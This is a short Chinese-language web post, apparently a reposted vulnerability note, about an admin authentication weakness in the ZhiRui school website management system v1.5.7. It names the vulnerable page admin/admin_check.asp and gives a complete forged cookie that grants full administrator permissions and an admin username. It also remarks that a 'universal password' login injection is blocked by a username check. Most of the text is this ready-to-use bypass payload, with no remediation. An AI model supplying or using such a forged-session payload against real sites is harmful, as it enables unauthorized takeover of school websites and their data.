1. 程式人生 > >智睿學校網站管理系統VER1.5.7後臺漏洞

智睿學校網站管理系統VER1.5.7後臺漏洞

漏洞頁面:admin/admin_check.asp


cookie:
rtime=1; ltime=1268355028173; cnzz_eid=62880375-1268290090-; cnzz_a1746221=4; sin1746221=none; ASPSESSIONIDASCSQRQT=GCDLGCMAFJLHLFPOIKOPKNNF; ZhiRui=Check=ZhiRuiSystem&AdminPurview=%7C111%2C%7C112%2C%7C113%2C%7C114%2C%7C115%2C%7C116%2C%7C117%2C%7C118%2C%7C119%2C%7C121%2C%7C122%2C%7C123%2C%7C211%2C%7C212%2C%7C213%2C%7C214%2C%7C311%2C%7C312%2C%7C313%2C%7C314%2C%7C1011%2C%7C1012%2C%7C1013%2C%7C1014%2C%7C511%2C%7C512%2C%7C513%2C%7C514%2C%7C611%2C%7C612%2C%7C711%2C%7C712%2C%7C713%2C%7C714%2C%7C411%2C%7C412%2C%7C413%2C%7C414%2C%7C415%2C%7C811%2C%7C812%2C%7C813%2C%7C814%2C%7C815%2C%7C911%2C&ZhiRuiUser=%B9%DC%C0%ED%D4%B1&ZhiRuiAdmin=newborn

關鍵字:


 後臺登陸本來可以用新一代萬能密碼登陸的

可是他驗證了獲取的使用者名稱和輸入的使用者名稱,所以成了雞肋